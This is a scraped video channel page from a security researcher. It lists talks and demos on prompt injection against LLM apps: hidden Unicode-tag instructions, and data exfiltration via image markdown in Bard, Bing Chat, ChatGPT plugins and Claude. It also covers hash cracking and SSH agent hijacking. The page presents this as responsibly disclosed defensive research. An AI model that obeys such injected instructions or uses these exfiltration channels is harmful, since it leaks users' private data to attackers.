Embrace The Red
Embrace The Red
  • 34
  • 675 923
ASCII Smuggling: Crafting Invisible Text and Decoding Hidden Secrets -New Threat for LLMs and beyond
This video provides a deep dive into ASCII Smuggling. It's possible hide invisible text in plain sight using Unicode Tags Block code points. Some Large Language Models (LLMs) interpret such hidden text as instructions, and some are also able to craft such hidden text!
Additionally, this has implications beyond Machine Learning, AI and LLM applications, as it allows rendering of invisible text in plain sight.
Blog Post: embracethered.com/blog/posts/2024/hiding-and-finding-text-with-unicode-tags/
ASCII Smuggler: embracethered.com/blog/ascii-smuggler.html
Переглядів: 777

Відео

Real-world exploits and mitigations in LLM applications (37c3)
Переглядів 20 тис.4 місяці тому
Video recording of my talk at the 37th Chaos Communication Congress in Hamburg titled "NEW IMPORTANT INSTRUCTIONS: Real-world exploits and mitigations in Large Language Model applications" about LLM app security and Prompt Injections specifically. A big thank you to the CCC organizers and all the volunteers for putting together such a great event! Source Video: media.ccc.de/v/37c3-12292-new_imp...
Hacking Google Bard: Prompt Injection to Data Exfiltration via Image Markdown Rendering (Demo Video)
Переглядів 5 тис.6 місяців тому
Demo video of end to end data exfiltration exploit via a malicious Google Doc. The exploit leverages an indirect prompt injection which injects an image markdown element which is the exfiltration channel. This vulnerability was responsibly disclosed to Google VRP on September, 19th 2023 and Google reported it as fixed October, 19th 2023. Details in this blog post: embracethered.com/blog/posts/2...
Data Exfiltration Vulnerabilities in LLM Applications and Chatbots: Bing Chat, ChatGPT and Claude
Переглядів 1,3 тис.8 місяців тому
During an Indirect Prompt Injection attack an adversary can inject malicious instructions to have a large language model (LLM) application (such as a chat bot) send data off to other servers on the Internet. In this video we discuss three techniques for data exfiltration, including proof-of-concepts I responsibly disclosed to OpenAI, Microsoft and Anthropic, a plugin vendor, and how the vendors...
Bing Chat - Data Exfiltration Exploit (responsibly disclosed to Microsoft and now fixed)
Переглядів 1,2 тис.10 місяців тому
This is the demo video I sent to Microsoft's Security Response Center when reporting the issue on April, 8th 2023. MSRC informed me on June, 15th 2023 that the vulnerability was fixed and hence can be disclosed publicly. Detailed Blog Post: embracethered.com/blog/posts/2023/bing-chat-data-exfiltration-poc-and-fix/
POC - ChatGPT Plugins: Indirect prompt injection leading to data exfiltration via images
Переглядів 3,9 тис.Рік тому
As predicted by security researchers, with the advent of plugins Indirect Prompt Injections are now a reality within ChatGPT’s ecosystem. Overview: User enters data 0:05 User asks ChatGPT to query the web 0:25 ChatGPT invokes the WebPilot Plugin 0:35 The Indirect Prompt Injection from the website succeeds 0:58 ChatGPT sent data to remote server 1:18 Accompanying blog post: embracethered.com/blo...
Adversarial Prompting - Tutorial + Lab
Переглядів 1,2 тис.Рік тому
Practical examples and try it yourself labs to help learn about and research Prompt Injections. Colab Notebook: colab.research.google.com/drive/1qGznuvmUj7dSQwS9A9L-M91jXwws-p7k The examples reach from simple scenarios, such as changing the output message to a specific text, to more complex scenarios such as JSON object injection as well as HTML/XSS and also Data Exfiltration. Intro & Setup 0:0...
Prompt Injections - An Introduction
Переглядів 4,6 тис.Рік тому
Many courses teach prompt engineering and currently pretty much all examples are vulnerable to Prompt Injections. Especially Indirect Prompt Injections are dangerous. They allow untrusted data to take control of the LLM (large language model) and give an AI a new instructions, mission and objective. This video aims to raise awareness of this rising problem. Injections Lab: colab.research.google...
Decrypting SSL/TLS browser traffic with Wireshark (using netsh trace start)
Переглядів 9 тис.Рік тому
Walk-through on how to use built-in Windows netsh tool to capture https browser network traffic, convert it using etl2pcapng, and then afterwards decrypt it with Wireshark. To do this we use SSLKEYLOGFILE and the netsh command line to create a network trace and TLS session keys. Sorry, audio seems to have some hiccups - but hopefully not too bad. Microsoft's ETL to pcap conversion tool is here:...
Simplify your life with ChatGPT API Shell Integration: Yolo your Bash + PowerShell Assistant (GPT-4)
Переглядів 9 тис.Рік тому
[Update]: The latest version of yolo supports gpt-4 now also (default is gpt-3.5-turbo). Introducing yolo, the AI powered Linux, macOS and Windows shell command assistant that takes your natural language instructions and harnesses the power of ChatGPT API to translate the instructions to valid shell commands. Ever wondered what bash command to use for a certain task? Do you have issues remember...
Grabbing and cracking macOS password hashes (with dscl and hashcat)
Переглядів 6 тис.Рік тому
Let's look at the dscl utility on macOS that allows hackers to query directory services information, including extracting sensitive fields such as the password hash. An admin can extract the ShadowHashData and then attempt to crack the hash with a tool such as hashcat. This is a post-exploitation technique to be aware of as Red and Blue Teamers and build tests and detections for. As always: Pen...
SSH Agent Hijacking - Hacking technique for Linux and macOS explained
Переглядів 2,7 тис.Рік тому
SSH Agent Hijacking is a powerful post-exploitation technique that an adversary might use to leverage SSH private keys stored in an SSH Agent. This video explains at a high level on how SSH Agent forwarding works, and what commands an attacker might perform to gain control of the SSH Agent of another user (using the SSH_AUTH_SOCK environment variable). For Blue Teamers this video will be useful...
How to extract NTLM Hashes from Wireshark Captures for cracking with Hashcat
Переглядів 7 тис.Рік тому
This videos shows how to filter a network traffic capture (pcap) to identify Net-NTLMv2 hashes and afterwards extract the relevant information to construct the correct format for cracking with Hashcat.
SQL Injection Attacks For Beginners (Basics)
Переглядів 1,1 тис.Рік тому
This video explains and demos the basics of an important application security vulnerability called SQL Injections and how database systems are attacked using this technique. It is a very common issue and also listed in the OWASP Top 10. At the end mitigations are also discussed. If you enjoy the video let me know in the comments and I will create another one with more advanced examples to help ...
Server-Side Request Forgery (SSRF) hacking variations you MUST KNOW about!
Переглядів 468Рік тому
This video covers the Server Side Request Forgery (SSRF) vulnerability class. Starting from a basic definition to understand the issue, to highlighting advanced variations you probably haven't seen before, including using it in combination with the Log4j vulnerability. The video also briefly describes how to mitigate/prevent the vulnerability from the developers side. Learn the hacks, stop the ...
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
Переглядів 1,4 тис.Рік тому
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
Переглядів 801Рік тому
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
Переглядів 3,1 тис.Рік тому
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
ChatGPT - Imagine you are a Microsoft SQL Server database server
Переглядів 562 тис.Рік тому
ChatGPT - Imagine you are a Microsoft SQL Server database server
ChatGPT - Commodore 64
Переглядів 1,1 тис.Рік тому
ChatGPT - Commodore 64
Understanding the basics of Cross-Site Request Forgery attacks
Переглядів 348Рік тому
Understanding the basics of Cross-Site Request Forgery attacks
Pass the Cookies and Pivot to the Clouds
Переглядів 254Рік тому
Pass the Cookies and Pivot to the Clouds
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker
Переглядів 3,8 тис.2 роки тому
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker
Trailer: Learn how to hack neural networks, so that we don't get stuck in the matrix!
Переглядів 9752 роки тому
Trailer: Learn how to hack neural networks, so that we don't get stuck in the matrix!
Awakening Beethoven with Machine Learning
Переглядів 3023 роки тому
Awakening Beethoven with Machine Learning
Performing port-proxying and port-forwarding on Windows
Переглядів 7 тис.3 роки тому
Performing port-proxying and port-forwarding on Windows
Image Scaling Attacks are CRAZY!!! Hiding images in plain sight (Machine Learning)
Переглядів 1,8 тис.3 роки тому
Image Scaling Attacks are CRAZY!!! Hiding images in plain sight (Machine Learning)
What is Tabnabbing?
Переглядів 5 тис.3 роки тому
What is Tabnabbing?
What is Cross Site Scripting (XSS)?
Переглядів 4753 роки тому
What is Cross Site Scripting (XSS)?
Web Application Security Fundamentals (must know basics for developers, testers and hackers)
Переглядів 6 тис.3 роки тому
Web Application Security Fundamentals (must know basics for developers, testers and hackers)

КОМЕНТАРІ

  • @octopus3141
    @octopus3141 8 днів тому

    Great stuff 👍

    • @embracethered
      @embracethered 7 днів тому

      Thanks for the visit and note. Appreciate it! Let me know if there are any relevant topics you'd like to see covered?

  • @Agathoz84
    @Agathoz84 9 днів тому

    nice video bru

    • @embracethered
      @embracethered 9 днів тому

      Thanks! Let me know if there are other topics of interest?

  • @user-or7kk7gh8u
    @user-or7kk7gh8u 23 дні тому

    Can you please share what .py file you has run on this video to monitor chatgpt3.5 chat (print-data-exfiltration-log.py) under code please share

    • @embracethered
      @embracethered 23 дні тому

      It was just a script that filters the web server log for requests from ChatGPT user agent and only shows the query parameter and no request IP - so it's easier to view. You can just grep /var/log/ngninx/access.log also (assuming you use nginx on Linux). I can see if I still have the script somewhere but it wasn't anything special.

  • @pez5491
    @pez5491 26 днів тому

    Gold!

  • @maloseevanschaba7343
    @maloseevanschaba7343 Місяць тому

    Perfect straight to the point,

  • @Astranix59
    @Astranix59 Місяць тому

    What wordlist file do you use?

    • @embracethered
      @embracethered Місяць тому

      Depends, a common source to get started is: github.com/danielmiessler/SecLists. Also, quite significant are the mutations and rulesets that are being used by the way.

    • @Astranix59
      @Astranix59 Місяць тому

      @@embracethered thank you!!

  • @chitchatvn5208
    @chitchatvn5208 2 місяці тому

    Thanks. Great content!

  • @chitchatvn5208
    @chitchatvn5208 2 місяці тому

    Thanks Yohann.

  • @chitchatvn5208
    @chitchatvn5208 2 місяці тому

    Thanks Yohann.

    • @embracethered
      @embracethered Місяць тому

      Glad you found it interesting! Thanks for checking it out!

  • @chitchatvn5208
    @chitchatvn5208 2 місяці тому

    thanks Yohann.

    • @embracethered
      @embracethered 2 місяці тому

      Thank you! Hope it was useful! 🙂

  • @chitchatvn5208
    @chitchatvn5208 2 місяці тому

    Thanks Johann.

  • @6cylbmw
    @6cylbmw 2 місяці тому

    I didn't really understand the vulnerability impact. You are exfiltrating own chat (user A) to own drive (user A) drive. How is it exploitable?

    • @embracethered
      @embracethered 2 місяці тому

      Attacker is causing the Chatbot to send past chat data to attackers server (in this case a google doc is capturing the exfiltrated data). Check out the linked blog post, explains it in detail.

  • @endone3661
    @endone3661 2 місяці тому

    what is this ?

    • @embracethered
      @embracethered 2 місяці тому

      It's about a Jupyter Notebook that allows to self-study prompt injection and to experiment and play around with the technique by solving a set of challenges.

  • @th3pac1fist
    @th3pac1fist 2 місяці тому

    🔥

    • @embracethered
      @embracethered 2 місяці тому

      Thanks!! It's probably one of my most interesting videos.

  • @RandomAccess2
    @RandomAccess2 2 місяці тому

    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "c:\temp\sslkeys\keys", "MACHINE") netsh trace start capture=yes tracefile=c:\temp\sslkeys\trace.etl report=disabled netsh trace stop

  • @notV3NOM
    @notV3NOM 2 місяці тому

    Thanks , great insights

    • @embracethered
      @embracethered 2 місяці тому

      Thanks for watching! Glad it was interesting.

  • @erinclay4917
    @erinclay4917 3 місяці тому

    How'd you get that cool paint splash effect around your head? What software are you using?

    • @embracethered
      @embracethered 3 місяці тому

      Thanks! It's just a custom image I created. drew a white circle on black background - then zigzagged that splash effect over with a brush and then use a filter for webcam in OBS to blend it in.

  • @void-qy4ov
    @void-qy4ov 3 місяці тому

    Great tut. Thanks 👍

    • @embracethered
      @embracethered 3 місяці тому

      Glad it was helpful! Thanks for watching!

  • @Sway55
    @Sway55 3 місяці тому

    how to do it for traffic outside of browser? say I have a desktop app

  • @TheHologr4m
    @TheHologr4m 3 місяці тому

    Was not expecting this in the playlist.

  • @petraat8806
    @petraat8806 3 місяці тому

    im trying to understand what just happened please can someone explain

    • @embracethered
      @embracethered 3 місяці тому

      You can read up on the details here: embracethered.com/blog/posts/2023/google-bard-data-exfiltration/ And if you want to understand the big picture around LLM prompt injections check out this talk m.ua-cam.com/video/qyTSOSDEC5M/v-deo.html Thanks for watching!

  • @kajalpuri3404
    @kajalpuri3404 3 місяці тому

    Thank you so much. Exactly the video I needed.

  • @plaverty9
    @plaverty9 4 місяці тому

    I just tried this, but the only difference is I was capturing this information over HTTP instead of SMB. Does that make a difference? I ask because I was trying to generate a proof of concept where I controlled the username and password going in, but it wouldn't crack. I tried four different times and it didn't work. Is something different when these are captured over HTTP instead of an SMB connection?

    • @embracethered
      @embracethered 3 місяці тому

      Good question. First thought is that it should just work the same, but I haven't tried. Relaying def works, that I have done many times in past.

    • @plaverty9
      @plaverty9 3 місяці тому

      Thanks. I had a colleague try it too, and got the same result as I did. This is for a pentest proof of concept, so I’m not in position to relay unfortunately.

  • @netor-3y4
    @netor-3y4 4 місяці тому

    ff

  • @347my455
    @347my455 4 місяці тому

    superb!

  • @Fitnessdealnews
    @Fitnessdealnews 4 місяці тому

    One of the best presentation I’ve seen

    • @embracethered
      @embracethered 4 місяці тому

      Thanks for watching! Really appreciate the feedback! 😀

  • @MohdAli-nz4yi
    @MohdAli-nz4yi 4 місяці тому

    I think a better conclusion is: never put in the context of an LLM information you need to keep private, because it will leak.

    • @embracethered
      @embracethered 4 місяці тому

      Thanks for watching and the note. I think that misses the point that the LLM can attack the hosting app/user, so developers/users can't trust the responses. this includes confused deputy issues (in the app), such as automatic tool invocation.

    • @MohdAli-nz4yi
      @MohdAli-nz4yi 4 місяці тому

      @@embracethered Agreed! So 2 big points: 1. Never put info in LLM context you don't want to leak. 2. Never put untrusted input into LLM context, it's like executing arbitrary code you have downloaded from the internet on your machine. LLM inputs must always be trusted, because the LLM will "execute" it in "trusted mode".

    • @embracethered
      @embracethered 4 місяці тому

      @@MohdAli-nz4yi (1) I agree we shouldn't put sensitive information, like passwords, credit card number, or sensitive PII into chatbots. For (2) The challenge is that everyone wants to have an LLM operate over untrusted data. And that's the problem that hopefully one day will have a deterministic and secure solution. For now the best advise is to not trust the output. e.g. Developers shouldn't blindly take the output and invoke other tools/plugins in agents or render output as HTML, and users shouldn't blindly trust the output because it can be a hallucination (or a backdoor), or attacker controlled via an indirect prompt injection. However, some use cases might be too risky to implement at all. And its best to threat model implementations accordingly to understand risks and implications.

  • @ludovicjacomme1804
    @ludovicjacomme1804 4 місяці тому

    Excellent presentation, thanks a lot for sharing, extremely informative.

    • @embracethered
      @embracethered 4 місяці тому

      Thanks for watching! Glad to hear it's informative! 🙂

  • @artemsemenov8136
    @artemsemenov8136 4 місяці тому

    Thank you, is awesome!

    • @embracethered
      @embracethered 4 місяці тому

      Glad you like it!

    • @artemsemenov8136
      @artemsemenov8136 4 місяці тому

      @@embracethered I'm a fan of yours, I've talked about your research at cybersecurity conferences in Russia. You're awesome.

    • @embracethered
      @embracethered 4 місяці тому

      Thank you! 🙏

    • @artemsemenov8136
      @artemsemenov8136 4 місяці тому

      @@embracethered what you think abot LLM security scanners, garak and vigil. Also, have you met P2SQlinjection in the real world ?

  • @macklemo5968
    @macklemo5968 4 місяці тому

    🔥

  • @jlf_
    @jlf_ 4 місяці тому

    I really enjoyed your talk, Johann! Thank you!

    • @embracethered
      @embracethered 4 місяці тому

      Thanks for watching and glad you enjoyed it! 🙂

  • @ninosawas3568
    @ninosawas3568 5 місяців тому

    Great video! Very informative. Interesting to see how the LLMs ability to "pay attention" is such a large exploit. I wonder if mitigating this issue would lead to LLMs being overall less effective at following user instructions

    • @embracethered
      @embracethered 5 місяців тому

      Thanks for watching! I believe you are correct, it's a double edged sword. The best mitigation at the moment is to not trust the responses. Unfortunately it's hence impossible at the moment to build a rather generic autonomous agent that uses tools automatically. It's a real bummer, because i think most of us want secure and safe agents.

  • @isiltarexilium798
    @isiltarexilium798 5 місяців тому

    How can I use annother host (as neuroai.host) instead of openai?

  • @madjack821
    @madjack821 6 місяців тому

    Is this blocked on some routers? I’ve tried this with my current network at the house and “key content” doesn’t show on the screen. I am running as administrator and previous networks are showing key content.

  • @mortenwormdue3593
    @mortenwormdue3593 6 місяців тому

    Only works, if the traffic comes from the browser - in your example, chrome provides the session keys. So, no - not really workable on a server.

  • @0q2628
    @0q2628 6 місяців тому

    love this idea :)

    • @embracethered
      @embracethered 6 місяців тому

      Thanks for watching! Yes, LLMs are awesome and fun to experiment with.

  • @owowhatsthis....3025
    @owowhatsthis....3025 6 місяців тому

    Thanks helps a lot. from 🇩🇪

    • @embracethered
      @embracethered 6 місяців тому

      Glad it helped! Thanks for watching!

  • @balonikowaty
    @balonikowaty 6 місяців тому

    Great work Johann, as always! The more we give access to other data sources. which include documents, the more we expose each other to indirect injection attacks. It is worth pointing out that instructions could have been made in white ink size 0.1, making the document look normal!

  • @fire17102
    @fire17102 6 місяців тому

    When does bard decide to load and use a doc? Is it only when stated in the prompt? Or can we set up a file that will be implicitly called on every prompt? Something like AI_SAFETY_MANIFEST_-_MUST_BE_READ_ON_EVERY_USER_PROMPT.doc 😏

  • @fire17102
    @fire17102 6 місяців тому

    Read the post, really good I guess these sort of procedures will work across many different stacks and companies Also I wonder if you log your attempts, probably allot of wisdom can be drawn from your first attempt evolving to the last. You got it on the 10th try. Maybe showing a smart llm all 10 of those could find patterns. Effectively creating a prompt optimizer thay bring you faster results next time. All the best

    • @embracethered
      @embracethered 6 місяців тому

      Thanks for the note! Yes, this is a very common flaw across LLM apps. Check out some of my other posts about Bing Chat, ChatGPT or Claude. Yep, on the iteration count - spot on. A lot of initial tests were around basic validation that injection and reading of chat history worked, then the addition of Image rendering, then in context learning examples to increase reliability of the exploit.

  • @LukmaansStack
    @LukmaansStack 6 місяців тому

    in development environment the cookies are setting but in production environment the cookies are not setting what is the solution for this issue please help

    • @embracethered
      @embracethered 6 місяців тому

      Thanks for watching! Seems like a developer question, it might be related to the domain or path properties of the cookies when they get set

  • @user-nl4qz3ej1y
    @user-nl4qz3ej1y 7 місяців тому

    Hi, for SSH agent forwarding to work, the ssh-agent service must first be initiated on our local machine. However, I'm confused that does it work there as well? Upon reviewing the SSH source code, it is evident that SSH utilizes the "AF_UNIX" family to establish a connection to the ssh-agent socket.

    • @embracethered
      @embracethered 7 місяців тому

      Hello, thanks for watching. Hope itvwas interesting. I’m not sure if I understand the question? But yeah, ssh-agent can run locally or remotely also.

  • @cedric60666
    @cedric60666 7 місяців тому

    Thanks for explaining this. I guess it would also work with "private" instances of ChatGPT or equivalent system, as long as the user input is not sanitized ...

    • @embracethered
      @embracethered 7 місяців тому

      Thanks for watching. I’m not sure how private instances work (or what they exactly are), but presumably yes, unless they put a configurable Content Security Policy or some other fix in place to not allow images to render/connect.

  • @levinsdurai4350
    @levinsdurai4350 7 місяців тому

    is without port posible in wiindows like mac and ubuntu ?

  • @aitboss85
    @aitboss85 8 місяців тому

    Can you please explain to me what is the saturn you typed in the browser? Is this a custom defined protocol to connect to your machine? and how can I do the same? Thank you!

    • @embracethered
      @embracethered 8 місяців тому

      Hi there, thanks for watching. It’s just the name of a web server, it’s using http protocol. can omit typing http(s) in most browsers.

    • @aitboss85
      @aitboss85 8 місяців тому

      @@embracethered I still can't figure out how to do it 🥹

    • @bicks4436
      @bicks4436 24 дні тому

      ​@aitboss85 the most simple way to do this without dns is to just add the name you want (ie saturn) and the IP address to your hosts file. Of course, if this is a private IP it will only work on that network unless you have additional things set up

  • @user-lh8fg4ou6i
    @user-lh8fg4ou6i 8 місяців тому

    Hi, I'm having an issue with the 'wordlist' section at the end.. I don't have a wordlist file.. how to create one or where to find?

    • @embracethered
      @embracethered Місяць тому

      Here are some good examples: github.com/danielmiessler/SecLists

  • @shaunakchattopadhyay6254
    @shaunakchattopadhyay6254 8 місяців тому

    Awesome poc. Thanks for sharing

    • @embracethered
      @embracethered 8 місяців тому

      Thanks for watching! 🙏 Glad you liked it!😀

  • @prokrastinator6648
    @prokrastinator6648 8 місяців тому

    really very clear explanation, props to that!

  • @lolygagger5991
    @lolygagger5991 8 місяців тому

    very cool, but one quick question. This vulnerability only works of the legit site links to a malicious site. Are there any real world reasons why a developer in real life might do this?

    • @embracethered
      @embracethered 8 місяців тому

      One scenario that comes to mind right away is that not all content on websites is controlled by the developer (link/allow to link to user generated content). Thanks for watching! 🙏